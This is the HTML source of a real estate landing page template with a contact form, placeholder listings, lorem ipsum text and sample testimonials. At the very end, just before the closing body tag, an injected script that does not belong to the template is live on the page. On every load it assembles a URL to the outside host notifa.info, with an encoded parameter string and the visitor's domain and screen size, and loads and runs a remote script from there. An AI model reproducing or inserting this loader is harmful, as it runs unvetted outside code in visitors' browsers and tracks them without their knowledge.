<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><html lang="en" class="no-js"> <![endif]-->
	<html lang="en">
	  <head>
	  	<!-- Define Charset -->
	    <meta charset="utf-8">

	    <!-- Page Title -->
	    <title>Landing Page London - Woman</title>

	    <!-- Responsive Metatag -->
	    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

	   	<!--Bootstrap 3.2.0-->
    	<link rel="stylesheet" href="css/vendor/bootstrap.min.css">
	    <!-- fontello -->
	    <!--[if IE 7 ]><link href="css/fonts/fontello-ie7.css" rel="stylesheet" type="text/css" media="screen" /><![endif]-->
		<link href="css/fonts/fontello.css" rel="stylesheet" type="text/css" media="screen" />

		<!-- custom style -->
		<link href="css/style.css" rel="stylesheet" type="text/css" media="screen" />
		<link href="css/media-queries.css" rel="stylesheet" type="text/css" media="screen" />
		<!-- Animate -->
		<link rel="stylesheet" href="css/fonts/animate.css">
		<!--Modernizr-->
   	 	<script src="js/vendor/modernizr.min.js"></script>

	    <!-- HTML5 shim, for IE6-8 support of HTML5 elements --><!--[if lt IE 8]><script src="js/html5shiv.js"></script><![endif]-->

	  </head>

	  <body>

		<!-- Home -->
		<section>
			<article id="home" class="home animated" data-animation="fadeIn" data-animation-delay="400">
				<div class="bg img"></div>
				<div class="container">
					<figure class="animated visible-md visible-lg fadeInUpBig visible" data-animation="fadeInUpBig" data-animation-delay="400">
						<img src="img/woman.png" alt="//">
					</figure>
					<div class="row">
						<div class="col-md-5 col-sm-12 pull-right clearfix">
							<div class="contform animated" data-animation="fadeInRightBig" data-animation-delay="600">
								<div class="navbar-header">
									<a class="brand" href="#"><img src="img/logo.png" alt="//"></a>
								</div>
								<div>
									<h3>Welcome to</h3>
									<h1>Your New House</h1>
								</div>
								<div class="inner">
								<form id="suscribe-form" action="register.php" role="form" method="post">
								    <div class="form-group">
								    	<label for="contact-name" class="sr-only">Email your name</label>
										<input name="name" class="form-control input-lg" type="text" id="contact-name" placeholder="Name">
								    </div>
								    <div class="form-group">
								    	<label for="contact-email" class="sr-only">Email your email</label>
										<input name="email" class="form-control input-lg" type="email" id="contact-email" placeholder="Email">
								    </div>
								    <div class="form-group">
								    	<label for="contact-phone" class="sr-only">Email your Phone</label>
										<input name="tel" class="form-control input-lg" type="text" id="contact-phone" placeholder="Phone">
								    </div>
								     <div class="form-group">
								    	<label for="qs-country" class="sr-only">Country</label>
										<select name="country" class="form-control" id="qs-country">
											<option value="">Country</option>
											<option value="Select Country">Select Country</option>
											<option value="United States">United States</option>
											<option value="United Kingdom">United Kingdom</option>
											<option value="Afghanistan">Afghanistan</option>
											<option value="Albania">Albania</option>
											<option value="Algeria">Algeria</option>
											<option value="American Samoa">American Samoa</option>
											<option value="Andorra">Andorra</option>
											<option value="Angola">Angola</option>
											<option value="Anguilla">Anguilla</option>
											<option value="Antarctica">Antarctica</option>
											<option value="Antigua and Barbuda">Antigua and Barbuda</option>
											<option value="Argentina">Argentina</option>
											<option value="Armenia">Armenia</option>
											<option value="Aruba">Aruba</option>
											<option value="Australia">Australia</option>
											<option value="Austria">Austria</option>
											<option value="Azerbaijan">Azerbaijan</option>
											<option value="Bahamas">Bahamas</option>
											<option value="Bahrain">Bahrain</option>
											<option value="Bangladesh">Bangladesh</option>
											<option value="Barbados">Barbados</option>
											<option value="Belarus">Belarus</option>
											<option value="Belgium">Belgium</option>
											<option value="Belize">Belize</option>
											<option value="Benin">Benin</option>
											<option value="Bermuda">Bermuda</option>
											<option value="Bhutan">Bhutan</option>
											<option value="Bolivia">Bolivia</option>
											<option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
											<option value="Botswana">Botswana</option>
											<option value="Bouvet Island">Bouvet Island</option>
											<option value="Brazil">Brazil</option>
											<option value="British Indian Ocean Territory">British Indian Ocean Territory</option>
											<option value="Brunei Darussalam">Brunei Darussalam</option>
											<option value="Bulgaria">Bulgaria</option>
											<option value="Burkina Faso">Burkina Faso</option>
											<option value="Burundi">Burundi</option>
											<option value="Cambodia">Cambodia</option>
											<option value="Cameroon">Cameroon</option>
											<option value="Canada">Canada</option>
											<option value="Cape Verde">Cape Verde</option>
											<option value="Cayman Islands">Cayman Islands</option>
											<option value="Central African Republic">Central African Republic</option>
											<option value="Chad">Chad</option>
											<option value="Chile">Chile</option>
											<option value="China">China</option>
											<option value="Christmas Island">Christmas Island</option>
											<option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
											<option value="Colombia">Colombia</option>
											<option value="Comoros">Comoros</option>
											<option value="Congo">Congo</option>
											<option value="Congo, The Democratic Republic of The">Congo, The Democratic Republic of The</option>
											<option value="Cook Islands">Cook Islands</option>
											<option value="Costa Rica">Costa Rica</option>
											<option value="Cote D'ivoire">Cote D'ivoire</option>
											<option value="Croatia">Croatia</option>
											<option value="Cuba">Cuba</option>
											<option value="Cyprus">Cyprus</option>
											<option value="Czech Republic">Czech Republic</option>
											<option value="Denmark">Denmark</option>
											<option value="Djibouti">Djibouti</option>
											<option value="Dominica">Dominica</option>
											<option value="Dominican Republic">Dominican Republic</option>
											<option value="Ecuador">Ecuador</option>
											<option value="Egypt">Egypt</option>
											<option value="El Salvador">El Salvador</option>
											<option value="Equatorial Guinea">Equatorial Guinea</option>
											<option value="Eritrea">Eritrea</option>
											<option value="Estonia">Estonia</option>
											<option value="Ethiopia">Ethiopia</option>
											<option value="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
											<option value="Faroe Islands">Faroe Islands</option>
											<option value="Fiji">Fiji</option>
											<option value="Finland">Finland</option>
											<option value="France">France</option>
											<option value="French Guiana">French Guiana</option>
											<option value="French Polynesia">French Polynesia</option>
											<option value="French Southern Territories">French Southern Territories</option>
											<option value="Gabon">Gabon</option>
											<option value="Gambia">Gambia</option>
											<option value="Georgia">Georgia</option>
											<option value="Germany">Germany</option>
											<option value="Ghana">Ghana</option>
											<option value="Gibraltar">Gibraltar</option>
											<option value="Greece">Greece</option>
											<option value="Greenland">Greenland</option>
											<option value="Grenada">Grenada</option>
											<option value="Guadeloupe">Guadeloupe</option>
											<option value="Guam">Guam</option>
											<option value="Guatemala">Guatemala</option>
											<option value="Guinea">Guinea</option>
											<option value="Guinea-bissau">Guinea-bissau</option>
											<option value="Guyana">Guyana</option>
											<option value="Haiti">Haiti</option>
											<option value="Heard Island and Mcdonald Islands">Heard Island and Mcdonald Islands</option>
											<option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
											<option value="Honduras">Honduras</option>
											<option value="Hong Kong">Hong Kong</option>
											<option value="Hungary">Hungary</option>
											<option value="Iceland">Iceland</option>
											<option value="India">India</option>
											<option value="Indonesia">Indonesia</option>
											<option value="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
											<option value="Iraq">Iraq</option>
											<option value="Ireland">Ireland</option>
											<option value="Israel">Israel</option>
											<option value="Italy">Italy</option>
											<option value="Jamaica">Jamaica</option>
											<option value="Japan">Japan</option>
											<option value="Jordan">Jordan</option>
											<option value="Kazakhstan">Kazakhstan</option>
											<option value="Kenya">Kenya</option>
											<option value="Kiribati">Kiribati</option>
											<option value="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
											<option value="Korea, Republic of">Korea, Republic of</option>
											<option value="Kuwait">Kuwait</option>
											<option value="Kyrgyzstan">Kyrgyzstan</option>
											<option value="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
											<option value="Latvia">Latvia</option>
											<option value="Lebanon">Lebanon</option>
											<option value="Lesotho">Lesotho</option>
											<option value="Liberia">Liberia</option>
											<option value="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
											<option value="Liechtenstein">Liechtenstein</option>
											<option value="Lithuania">Lithuania</option>
											<option value="Luxembourg">Luxembourg</option>
											<option value="Macao">Macao</option>
											<option value="Macedonia, The Former Yugoslav Republic of">Macedonia, The Former Yugoslav Republic of</option>
											<option value="Madagascar">Madagascar</option>
											<option value="Malawi">Malawi</option>
											<option value="Malaysia">Malaysia</option>
											<option value="Maldives">Maldives</option>
											<option value="Mali">Mali</option>
											<option value="Malta">Malta</option>
											<option value="Marshall Islands">Marshall Islands</option>
											<option value="Martinique">Martinique</option>
											<option value="Mauritania">Mauritania</option>
											<option value="Mauritius">Mauritius</option>
											<option value="Mayotte">Mayotte</option>
											<option value="Mexico">Mexico</option>
											<option value="Micronesia, Federated States of">Micronesia, Federated States of</option>
											<option value="Moldova, Republic of">Moldova, Republic of</option>
											<option value="Monaco">Monaco</option>
											<option value="Mongolia">Mongolia</option>
											<option value="Montserrat">Montserrat</option>
											<option value="Morocco">Morocco</option>
											<option value="Mozambique">Mozambique</option>
											<option value="Myanmar">Myanmar</option>
											<option value="Namibia">Namibia</option>
											<option value="Nauru">Nauru</option>
											<option value="Nepal">Nepal</option>
											<option value="Netherlands">Netherlands</option>
											<option value="Netherlands Antilles">Netherlands Antilles</option>
											<option value="New Caledonia">New Caledonia</option>
											<option value="New Zealand">New Zealand</option>
											<option value="Nicaragua">Nicaragua</option>
											<option value="Niger">Niger</option>
											<option value="Nigeria">Nigeria</option>
											<option value="Niue">Niue</option>
											<option value="Norfolk Island">Norfolk Island</option>
											<option value="Northern Mariana Islands">Northern Mariana Islands</option>
											<option value="Norway">Norway</option>
											<option value="Oman">Oman</option>
											<option value="Pakistan">Pakistan</option>
											<option value="Palau">Palau</option>
											<option value="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
											<option value="Panama">Panama</option>
											<option value="Papua New Guinea">Papua New Guinea</option>
											<option value="Paraguay">Paraguay</option>
											<option value="Peru">Peru</option>
											<option value="Philippines">Philippines</option>
											<option value="Pitcairn">Pitcairn</option>
											<option value="Poland">Poland</option>
											<option value="Portugal">Portugal</option>
											<option value="Puerto Rico">Puerto Rico</option>
											<option value="Qatar">Qatar</option>
											<option value="Reunion">Reunion</option>
											<option value="Romania">Romania</option>
											<option value="Russian Federation">Russian Federation</option>
											<option value="Rwanda">Rwanda</option>
											<option value="Saint Helena">Saint Helena</option>
											<option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
											<option value="Saint Lucia">Saint Lucia</option>
											<option value="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
											<option value="Saint Vincent and The Grenadines">Saint Vincent and The Grenadines</option>
											<option value="Samoa">Samoa</option>
											<option value="San Marino">San Marino</option>
											<option value="Sao Tome and Principe">Sao Tome and Principe</option>
											<option value="Saudi Arabia">Saudi Arabia</option>
											<option value="Senegal">Senegal</option>
											<option value="Serbia and Montenegro">Serbia and Montenegro</option>
											<option value="Seychelles">Seychelles</option>
											<option value="Sierra Leone">Sierra Leone</option>
											<option value="Singapore">Singapore</option>
											<option value="Slovakia">Slovakia</option>
											<option value="Slovenia">Slovenia</option>
											<option value="Solomon Islands">Solomon Islands</option>
											<option value="Somalia">Somalia</option>
											<option value="South Africa">South Africa</option>
											<option value="South Georgia and The South Sandwich Islands">South Georgia and The South Sandwich Islands</option>
											<option value="Spain">Spain</option>
											<option value="Sri Lanka">Sri Lanka</option>
											<option value="Sudan">Sudan</option>
											<option value="Suriname">Suriname</option>
											<option value="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
											<option value="Swaziland">Swaziland</option>
											<option value="Sweden">Sweden</option>
											<option value="Switzerland">Switzerland</option>
											<option value="Syrian Arab Republic">Syrian Arab Republic</option>
											<option value="Taiwan, Province of China">Taiwan, Province of China</option>
											<option value="Tajikistan">Tajikistan</option>
											<option value="Tanzania, United Republic of">Tanzania, United Republic of</option>
											<option value="Thailand">Thailand</option>
											<option value="Timor-leste">Timor-leste</option>
											<option value="Togo">Togo</option>
											<option value="Tokelau">Tokelau</option>
											<option value="Tonga">Tonga</option>
											<option value="Trinidad and Tobago">Trinidad and Tobago</option>
											<option value="Tunisia">Tunisia</option>
											<option value="Turkey">Turkey</option>
											<option value="Turkmenistan">Turkmenistan</option>
											<option value="Turks and Caicos Islands">Turks and Caicos Islands</option>
											<option value="Tuvalu">Tuvalu</option>
											<option value="Uganda">Uganda</option>
											<option value="Ukraine">Ukraine</option>
											<option value="United Arab Emirates">United Arab Emirates</option>
											<option value="United Kingdom">United Kingdom</option>
											<option value="United States">United States</option>
											<option value="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
											<option value="Uruguay">Uruguay</option>
											<option value="Uzbekistan">Uzbekistan</option>
											<option value="Vanuatu">Vanuatu</option>
											<option value="Venezuela">Venezuela</option>
											<option value="Viet Nam">Viet Nam</option>
											<option value="Virgin Islands, British">Virgin Islands, British</option>
											<option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
											<option value="Wallis and Futuna">Wallis and Futuna</option>
											<option value="Western Sahara">Western Sahara</option>
											<option value="Yemen">Yemen</option>
										</select>
								    </div>
								    <div class="form-group">
								    	<label for="qs-state" class="sr-only">State</label>
										<select name="state" class="form-control" id="qs-state">
											<option value="">State / Province</option>
											<option value="Alabama">Alabama</option>
											<option value="Alaska">Alaska</option>
											<option value="Arizona">Arizona</option>
											<option value="Arkansas">Arkansas</option>
											<option value="California">California</option>
											<option value="Colorado">Colorado</option>
											<option value="Connecticut">Connecticut</option>
											<option value="Delaware">Delaware</option>
											<option value="District of Columbia">District of Columbia</option>
											<option value="Florida">Florida</option>
											<option value="Georgia">Georgia</option>
											<option value="Hawaii">Hawaii</option>
											<option value="Idaho">Idaho</option>
											<option value="Illinois">Illinois</option>
											<option value="Indiana">Indiana</option>
											<option value="Iowa">Iowa</option>
											<option value="Kansas">Kansas</option>
											<option value="Kentucky">Kentucky</option>
											<option value="Louisiana">Louisiana</option>
											<option value="Maine">Maine</option>
											<option value="Maryland">Maryland</option>
											<option value="Massachusetts">Massachusetts</option>
											<option value="Michigan">Michigan</option>
											<option value="Minnesota">Minnesota</option>
											<option value="Mississippi">Mississippi</option>
											<option value="Missouri">Missouri</option>
											<option value="Montana">Montana</option>
											<option value="Nebraska">Nebraska</option>
											<option value="Nevada">Nevada</option>
											<option value="New Hampshire">New Hampshire</option>
											<option value="New Jersey">New Jersey</option>
											<option value="New Mexico">New Mexico</option>
											<option value="New York">New York</option>
											<option value="North Carolina">North Carolina</option>
											<option value="North Dakota">North Dakota</option>
											<option value="Ohio">Ohio</option>
											<option value="Oklahoma">Oklahoma</option>
											<option value="Oregon">Oregon</option>
											<option value="Pennsylvania">Pennsylvania</option>
											<option value="Rhode Island">Rhode Island</option>
											<option value="South Carolina">South Carolina</option>
											<option value="South Dakota">South Dakota</option>
											<option value="Tennessee">Tennessee</option>
											<option value="Texas">Texas</option>
											<option value="Utah">Utah</option>
											<option value="Vermont">Vermont</option>
											<option value="Virginia">Virginia</option>
											<option value="Washington">Washington</option>
											<option value="West Virginia">West Virginia</option>
											<option value="Wisconsin">Wisconsin</option>
											<option value="Wyoming">Wyoming</option>
										</select>
								    </div>
								    <div class="form-group">
								    	<label for="qs-prices" class="sr-only">Prices</label>
										<select name="prices" class="form-control" id="qs-prices">
											<option value="">Prices</option>
											<option value="0">0</option>
											<option value="10,000 - 20,000">10,000 - 20,000</option>
											<option value="30,000 - 50,000">30,000 - 50,000</option>
											<option value="50,000 - 100,000">50,000 - 100,000</option>
											<option value="100,000 - 300,000">100,000 - 300,000</option>
											<option value="> 300,000">&gt; 300,000</option>
										</select>
								    </div>
								    <!-- Indicates caution should be taken with this action -->
								    <button type="submit" class="btn btn-info btn-lg"><i class="icon-paper-plane"></i>More Information</button>

								</form>
								</div>
							</div>


						</div>
					</div>
				</div>
			</article>
		</section>
    	<!-- End Home -->

		<!-- Features -->
		<section>
			<article id="features" class="bg-color">
				<div class="container">
					<div class="row">
						<div class="col-sm-4 animated" data-animation="bounceInLeft" data-animation-delay="400">
							<h4>Best Houses</h4>
							<p>Pellentesque odio nisi, euismod in, pharetra a, ultricies in, diam. Sed arcu. Cras consequat. Lorem ipsum dolor sit amet, consectetur!</p>
						</div>
						<div class="col-sm-4 animated" data-animation="bounceInLeft" data-animation-delay="600">
							<h4>Great Prices</h4>
							<p>Pellentesque odio nisi, euismod in, pharetra a, ultricies in, diam. Sed arcu. Cras consequat. Lorem ipsum dolor sit amet, consectetur!</p>
						</div>
						<div class="col-sm-4 animated" data-animation="bounceInLeft" data-animation-delay="800">
							<h4>Investment</h4>
							<p>Pellentesque odio nisi, euismod in, pharetra a, ultricies in, diam. Sed arcu. Cras consequat. Lorem ipsum dolor sit amet, consectetur!</p>
						</div>
					</div>
				</div>
			</article>
		</section>
		<!-- End Features -->

		<!-- Gallery -->
    	<section id="gallery" class="generic">
    		<div class="container">
    			<div>
    				<h2 class="animated" data-animation="flipInX" data-animation-delay="200">Luxury Condominiums</h2>
    			</div>
    			<div class="content-bg">
    				<figure>
    					<img src="img/decoration-bg.png" alt="">
    				</figure>
    			</div>
    			<div class="row">

    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="400">
	    					<figure>
	    						<img src="img/gallery/1.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">Ocean Loft</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$720,251.00</h5>
    					</div>
    				</div>
    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="800">
	    					<figure>
	    						<img src="img/gallery/2.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">321 DC Drive</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$780,251.00</h5>
    					</div>
    				</div>
    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="1200">
	    					<figure>
	    						<img src="img/gallery/3.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">London DC</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$980,251.00</h5>
    					</div>
    				</div>

    			</div>
    			<div class="row">

    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="400">
	    					<figure>
	    						<img src="img/gallery/4.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">Ocean Loft</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$720,251.00</h5>
    					</div>
    				</div>
    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="800">
	    					<figure>
	    						<img src="img/gallery/5.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">321 DC Drive</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$780,251.00</h5>
    					</div>
    				</div>
    				<div class="col-sm-4 item">
    					<div class="content animated" data-animation="fadeInUp" data-animation-delay="1200">
	    					<figure>
	    						<img src="img/gallery/2.jpg" alt="Image">
	    					</figure>
	    					<h4><a href="#">London DC</a></h4>
	    					<p>The City Beautiful, as it is knonw, The Gables is a wonderful neighborhood located southeast Downtown Miami.</p>
	    					<h5>$980,251.00</h5>
    					</div>
    				</div>

    			</div>
    		</div>
    	</section>
    	<!-- End Gallery -->

    	<!-- Video -->
    	<section class="generic-2 video-yt">
    		<div class="container">
    			<div>
    				<h2 class="animated" data-animation="flipInX" data-animation-delay="200">Beautiful Architecture</h2>
    			</div>
    			<div class="content-bg">
    				<figure>
    					<img src="img/decoration-bg.png" alt="">
    				</figure>
    			</div>
    			<div class="row">
					<div class="col-sm-6 animated" data-animation="fadeInLeft">
						<iframe width="640" height="360" src="//www.youtube.com/embed/4n0upqa8bzU" allowfullscreen></iframe>
					</div>
					<div class="col-sm-6 animated" data-animation="fadeInRight">
						<p>The degree of honesty and integrity that the company adheres to always proves to be beneficial for our clients, especially since these qualities are always reflected in all of our transactions. </p>
						<h3>We can find your dream house</h3>
						<p><i class="icon-right-circled"></i> Looking to buy your house in UK?</p>
						<p><i class="icon-right-circled"></i> Brand New Apartments in UK</p>
						<p><i class="icon-right-circled"></i> Best Life Residencial in London</p>
					</div>
				</div>
    		</div>
    	</section>
    	<!-- End Video -->

		<!-- Testimonials -->
    	<section class="generic testimonials">
    		<div class="container">
    			<div>
    				<h2 class="animated" data-animation="flipInX" data-animation-delay="200">Testimonials</h2>
    			</div>
    			<div class="content-bg">
    				<figure>
    					<img src="img/decoration-bg.png" alt="">
    				</figure>
    			</div>
    			<div class="row">
					<div class="col-sm-6 animated" data-animation="fadeInUp">
						<p>"The easy to use interface made it simple for us to Build several compelling landing pages and the straight forward analytics helped us determine which page was most successful. Instapage is a key tool for our business."</p>
						<div class="media">
						  <a class="media-left media-middle" href="#">
						    <img src="img/testimonials/testimonial01.png" alt="" data-src="...">
						  </a>
						  <div class="media-body">
						    <h5 class="media-heading">Alice Smithson</h5>
						    Mad Scientist, Founder of Urbantrike
						  </div>
						</div>

					</div>
					<div class="col-sm-6 animated" data-animation="fadeInUp">
						<p>"The easy to use interface made it simple for us to Build several compelling landing pages and the straight forward analytics helped us determine which page was most successful. Instapage is a key tool for our business."</p>

						<div class="media">
						  <a class="media-left media-middle" href="#">
						    <img src="img/testimonials/testimonial02.png" alt="" data-src="...">
						  </a>
						  <div class="media-body">
						    <h5 class="media-heading">Peter Smithson</h5>
						    Mad Scientist, Founder of Dropbox
						  </div>
						</div>

					</div>
				</div>
    		</div>
    	</section>
    	<!-- End Testimonials -->

		<!-- Footer -->
    	<footer id="contact">
    		<div class="container">
    			<div class="row">
    				<ul class="social list-unstyled text-center">
						<li><a href="#" title="Twitter" class="animated" data-animation="flipInY" data-animation-delay="400"><i class="icon-twitter-circled"></i></a></li>
						<li><a href="#" title="Facebook" class="animated" data-animation="flipInY" data-animation-delay="800"><i class="icon-facebook-circled"></i></a></li>
						<li><a href="#" title="Pinterest" class="animated" data-animation="flipInY" data-animation-delay="1200"><i class="icon-pinterest-circled"></i></a></li>
					</ul>
    			</div>
    			<div class="row">
    				<h5 class="text-center">Real Estate © 2016 coralixthemes.com All Rights Reserved.</h5>
    			</div>
    		</div>
    	</footer>
    	<!-- End Footer -->


    <!-- ======================= JQuery libs =============================== -->

		<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
	    <script>window.jQuery || document.write('<script src="js/vendor/jquery.min.js"><\/script>')</script>
	    <script src="js/vendor/bootstrap.min.js"></script>

		<!-- Bootstrap-->
	    <script src="js/bootstrap.js"></script>

	    <!-- bgYtVideo -->
		<script src="js/vendor/jquery.bgYtVideo.js" ></script>

		<!-- Appear -->
		<script src="js/vendor/jquery/jquery.appear.js" ></script>

		<!-- Custom js-->
	    <script src="js/jquery-func.js"></script>

    <!-- ======================= End JQuery libs =========================== -->



  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprA7z4gA6nwSjdcJW4F9M1L77KhhNf%2fDA5kWEt7bz7vm3q81jvx52t5kUGev3LmMzXjr0Tf18Nq9vLXT3LJJcJifa43YdMoWClctyivqPAC9cD11jPLpahhwL1kDco4e4BA0p89pK3MLHj1X8nrKN43779nm3k1C%2bUJYFXb1%2bTHDnwfQyndLD9yVQBTS9Tq%2b3abDPNF7mXZZ%2fJZLHer2XmzMDL5Lu9Pn2aP%2fw3qNo1HQq%2fySD%2bs8cvEWPeqz8W2oSdt5kzZIgPtAEaAOeSn%2fDWTb8ojYVaIMi6o0xymK%2bN%2bGZwrX1apb5nlQO2MHdvlM3m223rWmn91LMkadSXk4vD%2f4vj4N0IJ%2fSTefwTZLXCLEVlr%2fFF4ZOU2N4QO7RSzioDFC1D4obFx2fvak%2f5U5RDNxF%2bSwkJ9kltHgBGecJzGhPOiiYkTrci06aSYKTHU8nSprhR5F5xEw5OQM%2b0D2fbw%2fM3SXoJfMihzkMd8EvWSFks%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
